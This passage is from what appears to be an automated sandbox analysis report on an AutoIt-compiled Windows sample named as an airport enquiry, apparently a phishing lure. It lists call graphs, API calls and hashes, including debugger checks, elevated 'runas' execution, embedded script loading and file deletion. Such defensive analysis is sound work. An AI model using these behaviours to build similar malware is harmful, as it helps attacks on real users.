99928->99936 99938 cd7405 59 API calls 99928->99938 99940 cc0e00 99928->99940 99943 c8a6ba 99928->99943 100007 c8ca20 331 API calls 2 library calls 99928->100007 100008 c8ba60 60 API calls Mailbox 99928->100008 100017 cea0b5 89 API calls 4 library calls 99929->100017 99931->99925 99932->99928 99934 cc048e 99935->99928 99936->99928 99938->99928 99939 cd66f4 Mailbox 59 API calls 99939->99923 100022 cea0b5 89 API calls 4 library calls 99940->100022 99942->99925 100021 cea0b5 89 API calls 4 library calls 99943->100021 99944->99925 100012 c8f803 331 API calls 99945->100012 99947->99925 100019 c89df0 59 API calls Mailbox 99948->100019 100020 cea0b5 89 API calls 4 library calls 99950->100020 99952 cc0c86 99952->99923 99952->99939 100010 c89e9c 60 API calls Mailbox 99953->100010 99954->99925 99956 c8b38d 100011 c89e9c 60 API calls Mailbox 99956->100011 99961->99920 99961->99923 99961->99952 99962 cc00e0 VariantClear 99961->99962 99963 cf474d 331 API calls 99961->99963 99964 cfe24b 129 API calls 99961->99964 99965 ced2e6 101 API calls 99961->99965 99966 cfe237 129 API calls 99961->99966 99967 c92123 95 API calls 99961->99967 99968 ced2e5 101 API calls 99961->99968 100009 c89df0 59 API calls Mailbox 99961->100009 100016 cd7405 59 API calls 99961->100016 99962->99961 99963->99961 99964->99961 99965->99961 99966->99961 99967->99961 99968->99961 99970 c877c7 59 API calls 99969->99970 99971 cfc608 99970->99971 99972 c877c7 59 API calls 99971->99972 99973 cfc610 99972->99973 99974 c877c7 59 API calls 99973->99974 99975 cfc618 99974->99975 99976 c89997 84 API calls 99975->99976 99999 cfc626 99976->99999 99977 c87d2c 59 API calls 99977->99999 99978 cfc80f 99979 cfc83c Mailbox 99978->99979 100026 c89b9c 59 API calls Mailbox 99978->100026 99979->99925 99981 cfc7f6 99982 c87e0b 59 API calls 99981->99982 99986 cfc803 99982->99986 99983 c87a84 59 API calls 99983->99999 99984 cfc811 99987 c87e0b 59 API calls 99984->99987 99985 c881a7 59 API calls 99985->99999 99989 c87c8e 59 API calls 99986->99989 99990 cfc820 99987->99990 99988 c87faf 59 API calls 99991 cfc6bd CharUpperBuffW 99988->99991 99989->99978 99992 c87c8e 59 API calls 99990->99992 100024 c8859a 68 API calls 99991->100024 99992->99978 99993 c87faf 59 API calls 99995 cfc77d CharUpperBuffW 99993->99995 100025 c8c707 69 API calls 2 library calls 99995->100025 99997 c89997 84 API calls 99997->99999 99998 c87c8e 59 API calls 99998->99999 99999->99977 99999->99978 99999->99979 99999->99981 99999->99983 99999->99984 99999->99985 99999->99988 99999->99993 99999->99997 99999->99998 100000 c87e0b 59 API calls 99999->100000 100000->99999 100002 ce7bec 100001->100002 100003 ca0ff6 Mailbox 59 API calls 100002->100003 100004 ce7bfa 100003->100004 100005 c877c7 59 API calls 100004->100005 100006 ce7c08 100004->100006 100005->100006 100006->99925 100007->99928 100008->99928 100009->99961 100010->99956 100011->99945 100012->99920 100013->99925 100014->99925 100015->99925 100016->99961 100017->99934 100018->99952 100019->99952 100020->99952 100021->99923 100022->99924 100023->99923 100024->99999 100025->99999 100026->99979 100027 c81066 100032 c8f8cf 100027->100032 100029 c8106c 100030 ca2f80 __cinit 67 API calls 100029->100030 100031 c81076 100030->100031 100033 c8f8f0 100032->100033 100065 ca0143 100033->100065 100037 c8f937 100038 c877c7 59 API calls 100037->100038 100039 c8f941 100038->100039 100040 c877c7 59 API calls 100039->100040 100041 c8f94b 100040->100041 100042 c877c7 59 API calls 100041->100042 100043 c8f955 100042->100043 100044 c877c7 59 API calls 100043->100044 100045 c8f993 100044->100045 100046 c877c7 59 API calls 100045->100046 100047 c8fa5e 100046->100047 100075 c960e7 100047->100075 100051 c8fa90 100052 c877c7 59 API calls 100051->100052 100053 c8fa9a 100052->100053 100103 c9ffde 100053->100103 100055 c8fae1 100056 c8faf1 GetStdHandle 100055->100056 100057 c8fb3d 100056->100057 100058 cc49d5 100056->100058 100059 c8fb45 OleInitialize 100057->100059 100058->100057 100060 cc49de 100058->100060 100059->100029 100110 ce6dda 64 API calls Mailbox 100060->100110 100062 cc49e5 100111 ce74a9 CreateThread 100062->100111 100064 cc49f1 CloseHandle 100064->100059 100112 ca021c 100065->100112 100068 ca021c 59 API calls 100069 ca0185 100068->100069 100070 c877c7 59 API calls 100069->100070 100071 ca0191 100070->100071 100072 c87d2c 59 API calls 100071->100072 100073 c8f8f6 100072->100073 100074 ca03a2 6 API calls 100073->100074 100074->100037 100076 c877c7 59 API calls 100075->100076 100077 c960f7 100076->100077 100078 c877c7 59 API calls 100077->100078 100079 c960ff 100078->100079 100119 c95bfd 100079->100119 100082 c95bfd 59 API calls 100083 c9610f 100082->100083 100084 c877c7 59 API calls 100083->100084 100085 c9611a 100084->100085 100086 ca0ff6 Mailbox 59 API calls 100085->100086 100087 c8fa68 100086->100087 100088 c96259 100087->100088 100089 c96267 100088->100089 100090 c877c7 59 API calls 100089->100090 100091 c96272 100090->100091 100092 c877c7 59 API calls 100091->100092 100093 c9627d 100092->100093 100094 c877c7 59 API calls 100093->100094 100095 c96288 100094->100095 100096 c877c7 59 API calls 100095->100096 100097 c96293 100096->100097 100098 c95bfd 59 API calls 100097->100098 100099 c9629e 100098->100099 100100 ca0ff6 Mailbox 59 API calls 100099->100100 100101 c962a5 RegisterWindowMessageW 100100->100101 100101->100051 100104 c9ffee 100103->100104 100105 cd5cc3 100103->100105 100106 ca0ff6 Mailbox 59 API calls 100104->100106 100122 ce9d71 60 API calls 100105->100122 100108 c9fff6 100106->100108 100108->100055 100109 cd5cce 100110->100062 100111->100064 100123 ce748f 65 API calls 100111->100123 100113 c877c7 59 API calls 100112->100113 100114 ca0227 100113->100114 100115 c877c7 59 API calls 100114->100115 100116 ca022f 100115->100116 100117 c877c7 59 API calls 100116->100117 100118 ca017b 100117->100118 100118->100068 100120 c877c7 59 API calls 100119->100120 100121 c95c05 100120->100121 100121->100082 100122->100109 100124 c81016 100129 c84ad2 100124->100129 100127 ca2f80 __cinit 67 API calls 100128 c81025 100127->100128 100130 ca0ff6 Mailbox 59 API calls 100129->100130 100131 c84ada 100130->100131 100132 c8101b 100131->100132 100136 c84a94 100131->100136 100132->100127 100137 c84a9d 100136->100137 100138 c84aaf 100136->100138 100139 ca2f80 __cinit 67 API calls 100137->100139 100140 c84afe 100138->100140 100139->100138 100141 c877c7 59 API calls 100140->100141 100142 c84b16 GetVersionExW 100141->100142 100143 c87d2c 59 API calls 100142->100143 100144 c84b59 100143->100144 100145 c87e8c 59 API calls 100144->100145 100150 c84b86 100144->100150 100146 c84b7a 100145->100146 100147 c87886 59 API calls 100146->100147 100147->100150 100148 c84bf1 GetCurrentProcess IsWow64Process 100149 c84c0a 100148->100149 100152 c84c89 GetSystemInfo 100149->100152 100153 c84c20 100149->100153 100150->100148 100151 cbdc8d 100150->100151 100154 c84c56 100152->100154 100164 c84c95 100153->100164 100154->100132 100157 c84c7d GetSystemInfo 100159 c84c47 100157->100159 100158 c84c32 100160 c84c95 2 API calls 100158->100160 100159->100154 100161 c84c4d FreeLibrary 100159->100161 100162 c84c3a GetNativeSystemInfo 100160->100162 100161->100154 100162->100159 100165 c84c2e 100164->100165 100166 c84c9e LoadLibraryA 100164->100166 100165->100157 100165->100158 100166->100165 100167 c84caf GetProcAddress 100166->100167 100167->100165

            Executed Functions

            Function 00C83B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C83B7A
            • IsDebuggerPresent.KERNEL32 ref: 00C83B8C
            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D462F8,00D462E0,?,?), ref: 00C83BFD
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
              • Part of subcall function 00C90A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C83C26,00D462F8,?,?,?), ref: 00C90ACE
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C83C81
            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00D393F0,00000010), ref: 00CBD4BC
            • SetCurrentDirectoryW.KERNEL32(?,00D462F8,?,?,?), ref: 00CBD4F4
            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D35D40,00D462F8,?,?,?), ref: 00CBD57A
            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00CBD581
              • Part of subcall function 00C83A58: GetSysColorBrush.USER32(0000000F), ref: 00C83A62
              • Part of subcall function 00C83A58: LoadCursorW.USER32(00000000,00007F00), ref: 00C83A71
              • Part of subcall function 00C83A58: LoadIconW.USER32(00000063), ref: 00C83A88
              • Part of subcall function 00C83A58: LoadIconW.USER32(000000A4), ref: 00C83A9A
              • Part of subcall function 00C83A58: LoadIconW.USER32(000000A2), ref: 00C83AAC
              • Part of subcall function 00C83A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C83AD2
              • Part of subcall function 00C83A58: RegisterClassExW.USER32(?), ref: 00C83B28
              • Part of subcall function 00C839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C83A15
              • Part of subcall function 00C839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C83A36
              • Part of subcall function 00C839E7: ShowWindow.USER32(00000000,?,?), ref: 00C83A4A
              • Part of subcall function 00C839E7: ShowWindow.USER32(00000000,?,?), ref: 00C83A53
              • Part of subcall function 00C843DB: _memset.LIBCMT ref: 00C84401
              • Part of subcall function 00C843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C844A6
            Strings
            • runas, xrefs: 00CBD575
            • This is a third-party compiled AutoIt script., xrefs: 00CBD4B4
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
            • String ID: This is a third-party compiled AutoIt script.$runas
            • API String ID: 529118366-3287110873
            • Opcode ID: 6ec6de1bc9ab085e845766df45433884d6675d8a98e61d8f370b41d8bb24d8b9
            • Instruction ID: 732c5fd8a1e09af8bab55d1515e18f2ef963bd6701d9eddfd15c9c1372bb2842
            • Opcode Fuzzy Hash: 6ec6de1bc9ab085e845766df45433884d6675d8a98e61d8f370b41d8bb24d8b9
            • Instruction Fuzzy Hash: 7051F775904388BFCF11FFB4DC45AED7B74AB06708F144265F456A22A1DAB0C605EB3A
            Function 00C84AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 942 c84afe-c84b5e call c877c7 GetVersionExW call c87d2c 947 c84c69-c84c6b 942->947 948 c84b64 942->948 949 cbdb90-cbdb9c 947->949 950 c84b67-c84b6c 948->950 951 cbdb9d-cbdba1 949->951 952 c84c70-c84c71 950->952 953 c84b72 950->953 955 cbdba3 951->955 956 cbdba4-cbdbb0 951->956 954 c84b73-c84baa call c87e8c call c87886 952->954 953->954 964 cbdc8d-cbdc90 954->964 965 c84bb0-c84bb1 954->965 955->956 956->951 958 cbdbb2-cbdbb7 956->958 958->950 960 cbdbbd-cbdbc4 958->960 960->949 962 cbdbc6 960->962 966 cbdbcb-cbdbce 962->966 967 cbdca9-cbdcad 964->967 968 cbdc92 964->968 965->966 969 c84bb7-c84bc2 965->969 970 c84bf1-c84c08 GetCurrentProcess IsWow64Process 966->970 971 cbdbd4-cbdbf2 966->971 976 cbdc98-cbdca1 967->976 977 cbdcaf-cbdcb8 967->977 972 cbdc95 968->972 973 c84bc8-c84bca 969->973 974 cbdc13-cbdc19 969->974 978 c84c0a 970->978 979 c84c0d-c84c1e 970->979 971->970 975 cbdbf8-cbdbfe 971->975 972->976 980 cbdc2e-cbdc3a 973->980 981 c84bd0-c84bd3 973->981 984 cbdc1b-cbdc1e 974->984 985 cbdc23-cbdc29 974->985 982 cbdc08-cbdc0e 975->982 983 cbdc00-cbdc03 975->983 976->967 977->972 986 cbdcba-cbdcbd 977->986 978->979 987 c84c89-c84c93 GetSystemInfo 979->987 988 c84c20-c84c30 call c84c95 979->988 992 cbdc3c-cbdc3f 980->992 993 cbdc44-cbdc4a 980->993 989 cbdc5a-cbdc5d 981->989 990 c84bd9-c84be8 981->990 982->970 983->970 984->970 985->970 986->976 991 c84c56-c84c66 987->991 999 c84c7d-c84c87 GetSystemInfo 988->999 1000 c84c32-c84c3f call c84c95 988->1000 989->970 998 cbdc63-cbdc78 989->998 995 cbdc4f-cbdc55 990->995 996 c84bee 990->996 992->970 993->970 995->970 996->970 1001 cbdc7a-cbdc7d 998->1001 1002 cbdc82-cbdc88 998->1002 1003 c84c47-c84c4b 999->1003 1007 c84c41-c84c45 GetNativeSystemInfo 1000->1007 1008 c84c76-c84c7b 1000->1008 1001->970 1002->970 1003->991 1005 c84c4d-c84c50 FreeLibrary 1003->1005 1005->991 1007->1003 1008->1007
            APIs
            • GetVersionExW.KERNEL32(?), ref: 00C84B2B
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            • GetCurrentProcess.KERNEL32(?,00D0FAEC,00000000,00000000,?), ref: 00C84BF8
            • IsWow64Process.KERNEL32(00000000), ref: 00C84BFF
            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C84C45
            • FreeLibrary.KERNEL32(00000000), ref: 00C84C50
            • GetSystemInfo.KERNEL32(00000000), ref: 00C84C81
            • GetSystemInfo.KERNEL32(00000000), ref: 00C84C8D
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
            • String ID:
            • API String ID: 1986165174-0
            • Opcode ID: 94be10f2d79760aa3603a16b96604d1722168c5d80486a1251df33c0f409b45d
            • Instruction ID: eba6f6c062a2f12054a8fe4ac6ca58a55b1b4218ab938681293c903541865dac
            • Opcode Fuzzy Hash: 94be10f2d79760aa3603a16b96604d1722168c5d80486a1251df33c0f409b45d
            • Instruction Fuzzy Hash: 7791E43154ABC1DEC735DB6884511AAFFE4AF2A304F584E9ED0DB93A01D220EA48D72D
            Function 00C84FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1009 c84fe9-c85001 CreateStreamOnHGlobal 1010 c85021-c85026 1009->1010 1011 c85003-c8501a FindResourceExW 1009->1011 1012 cbdd5c-cbdd6b LoadResource 1011->1012 1013 c85020 1011->1013 1012->1013 1014 cbdd71-cbdd7f SizeofResource 1012->1014 1013->1010 1014->1013 1015 cbdd85-cbdd90 LockResource 1014->1015 1015->1013 1016 cbdd96-cbddb4 1015->1016 1016->1013
            APIs
            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C84EEE,?,?,00000000,00000000), ref: 00C84FF9
            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C84EEE,?,?,00000000,00000000), ref: 00C85010
            • LoadResource.KERNEL32(?,00000000,?,?,00C84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C84F8F), ref: 00CBDD60
            • SizeofResource.KERNEL32(?,00000000,?,?,00C84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C84F8F), ref: 00CBDD75
            • LockResource.KERNEL32(00C84EEE,?,?,00C84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C84F8F,00000000), ref: 00CBDD88
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
            • String ID: SCRIPT
            • API String ID: 3051347437-3967369404
            • Opcode ID: 5c061b098342d3980ec695669d5a0bf591ce72450b572ac2964fc351bd0073c6
            • Instruction ID: 1ec00d49fad3f1b5f5cfa4eeedb4457a2c1508fd1a7f0ebecdc1b05b33bc73e7
            • Opcode Fuzzy Hash: 5c061b098342d3980ec695669d5a0bf591ce72450b572ac2964fc351bd0073c6
            • Instruction Fuzzy Hash: C9115A75200700AFD7319B65DC58F677BB9EBC9B55F20816CF41ADA660DBA1EC008674
            Function 00C8FE40 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharUpper
            • String ID:
            • API String ID: 3964851224-0
            • Opcode ID: 6e63ab64dfb426ab83e9cc45c00a2b8fb9c41f730881a1416c0630d5f3110396
            • Instruction ID: 8ac9cf2ed070b097c32254561a82023827db00371fbf755a8ef165d2c0a6a51e
            • Opcode Fuzzy Hash: 6e63ab64dfb426ab83e9cc45c00a2b8fb9c41f730881a1416c0630d5f3110396
            • Instruction Fuzzy Hash: C39278706083418FDB24DF14C494B6AB7E1BF89308F24896DF89A8B362D771ED45CB92
            Function 00CE4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
            Download Yara Rule
            APIs
            • GetFileAttributesW.KERNELBASE(?,00CBE7C1), ref: 00CE46A6
            • FindFirstFileW.KERNELBASE(?,?), ref: 00CE46B7
            • FindClose.KERNEL32(00000000), ref: 00CE46C7
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FileFind$AttributesCloseFirst
            • String ID:
            • API String ID: 48322524-0
            • Opcode ID: 73175fc2bbe2b4947cc874d16e8e65a9df25004f4ccdf4a548525a79164efadf
            • Instruction ID: e9e9e8362e61c14fe42c4c03a07a3d3e0416655f28f6b5690aad46d95d481c5a
            • Opcode Fuzzy Hash: 73175fc2bbe2b4947cc874d16e8e65a9df25004f4ccdf4a548525a79164efadf
            • Instruction Fuzzy Hash: 3EE020314105005BC224B738EC4D5EE775CDE06335F200715F939C15E0E7B06D5085E9
            Function 00C8E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
            Download Yara Rule
            Strings
            • Variable must be of type 'Object'., xrefs: 00CC428C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID: Variable must be of type 'Object'.
            • API String ID: 0-109567571
            • Opcode ID: 0f8fcef8c15808db49e6269c43102db8fe0719e7000adde666f5fe26bd0a28f5
            • Instruction ID: 1c2b940623359d77ff10f81cbfb7703a706b042810a355fd22fb6dc4f0267e87
            • Opcode Fuzzy Hash: 0f8fcef8c15808db49e6269c43102db8fe0719e7000adde666f5fe26bd0a28f5
            • Instruction Fuzzy Hash: 78A2AF74A04215CFCB24EF99C480AADB7B1FF49318F24806DE926AB351D771ED42CB99
            Function 00C90B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
            Download Yara Rule
            APIs
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C90BBB
            • timeGetTime.WINMM ref: 00C90E76
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C90FB3
            • TranslateMessage.USER32(?), ref: 00C90FC7
            • DispatchMessageW.USER32(?), ref: 00C90FD5
            • Sleep.KERNEL32(0000000A), ref: 00C90FDF
            • LockWindowUpdate.USER32(00000000,?,?), ref: 00C9105A
            • DestroyWindow.USER32 ref: 00C91066
            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C91080
            • Sleep.KERNEL32(0000000A,?,?), ref: 00CC52AD
            • TranslateMessage.USER32(?), ref: 00CC608A
            • DispatchMessageW.USER32(?), ref: 00CC6098
            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CC60AC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
            • API String ID: 4003667617-3242690629
            • Opcode ID: 7f23c6fe264efa8f81607b17791fd70bec131551fe113433dcc7f5eb26aa4db0
            • Instruction ID: f827ae144cfcd8923259ab242050c0a9164ec874e23aced2dc38b6f245dac3c1
            • Opcode Fuzzy Hash: 7f23c6fe264efa8f81607b17791fd70bec131551fe113433dcc7f5eb26aa4db0
            • Instruction Fuzzy Hash: 52B2B170608741DFDB28DF24C888FAAB7E4BF85304F24491DF49A87291DB71E985DB92
            Function 00CE93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
              • Part of subcall function 00CE91E9: __time64.LIBCMT ref: 00CE91F3
              • Part of subcall function 00C85045: _fseek.LIBCMT ref: 00C8505D
            • __wsplitpath.LIBCMT ref: 00CE94BE
              • Part of subcall function 00CA432E: __wsplitpath_helper.LIBCMT ref: 00CA436E
            • _wcscpy.LIBCMT ref: 00CE94D1
            • _wcscat.LIBCMT ref: 00CE94E4
            • __wsplitpath.LIBCMT ref: 00CE9509
            • _wcscat.LIBCMT ref: 00CE951F
            • _wcscat.LIBCMT ref: 00CE9532
              • Part of subcall function 00CE922F: _memmove.LIBCMT ref: 00CE9268
              • Part of subcall function 00CE922F: _memmove.LIBCMT ref: 00CE9277
            • _wcscmp.LIBCMT ref: 00CE9479
              • Part of subcall function 00CE99BE: _wcscmp.LIBCMT ref: 00CE9AAE
              • Part of subcall function 00CE99BE: _wcscmp.LIBCMT ref: 00CE9AC1
            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CE96DC
            • _wcsncpy.LIBCMT ref: 00CE974F
            • DeleteFileW.KERNEL32(?,?), ref: 00CE9785
            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CE979B
            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CE97AC
            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CE97BE
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
            • String ID:
            • API String ID: 1500180987-0
            • Opcode ID: b3bd105b97f684792a542e12d264e39fa3c6a4704f2649ad2de8407b0ae62e0d
            • Instruction ID: 62e9fa3a398dfe1bcdc0a139366f042268c8d51a0208f742c9f4ed824218ed67
            • Opcode Fuzzy Hash: b3bd105b97f684792a542e12d264e39fa3c6a4704f2649ad2de8407b0ae62e0d
            • Instruction Fuzzy Hash: 11C12CB1D00229AEDF21DFA5CC85ADEB7BDEF45304F0040AAF609E7151EB709A849F65
            Function 00C83018 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 70windowregistryCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • GetSysColorBrush.USER32(0000000F), ref: 00C83074
            • RegisterClassExW.USER32(00000030), ref: 00C8309E
            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C830AF
            • InitCommonControlsEx.COMCTL32(?), ref: 00C830CC
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C830DC
            • LoadIconW.USER32(000000A9), ref: 00C830F2
            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C83101
            Strings
            Memory Dump Source
